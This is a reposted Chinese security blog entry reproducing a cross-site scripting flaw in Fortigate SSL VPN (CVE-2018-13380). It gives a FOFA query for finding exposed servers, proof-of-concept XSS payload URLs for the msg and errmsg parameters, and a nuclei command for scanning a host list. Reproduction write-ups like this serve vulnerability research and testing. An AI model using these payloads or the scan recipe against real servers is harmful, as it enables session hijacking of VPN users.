漏洞复现 Fortigate SSL VPN msg/errmsg xss漏洞

admin 2024年11月7日12:04:49评论19 views字数 439阅读1分27秒阅读模式

0x01 漏洞描述

Fortinet将其SSL VPN产品线称为Fortigate SSL VPN,主要应用于最终用户以及中型企业。目前互联网上这些服务器的数量已超过48万台,主要集中在亚洲及欧洲区域。FortinetSSL VPN系统存在xss漏洞,攻击者通过漏洞可以劫持用户会话等操作。

漏洞复现 Fortigate SSL VPN msg/errmsg xss漏洞

0x02 漏洞复现

fofaapp="FORTINET-SSLVPN"

1.执行POC,弹出1377

/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E

漏洞复现 Fortigate SSL VPN msg/errmsg xss漏洞

2.nuclei验证脚本修改版本已发布知识星球

nuclei.exe -t CVE-2018-13380.yaml -l subs.txt -stats

漏洞复现 Fortigate SSL VPN msg/errmsg xss漏洞

原文始发于微信公众号(融云攻防实验室):漏洞复现 Fortigate SSL VPN msg/errmsg xss漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月7日12:04:49
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现 Fortigate SSL VPN msg/errmsg xss漏洞https://cn-sec.com/archives/1817429.html

发表评论

匿名网友 填写信息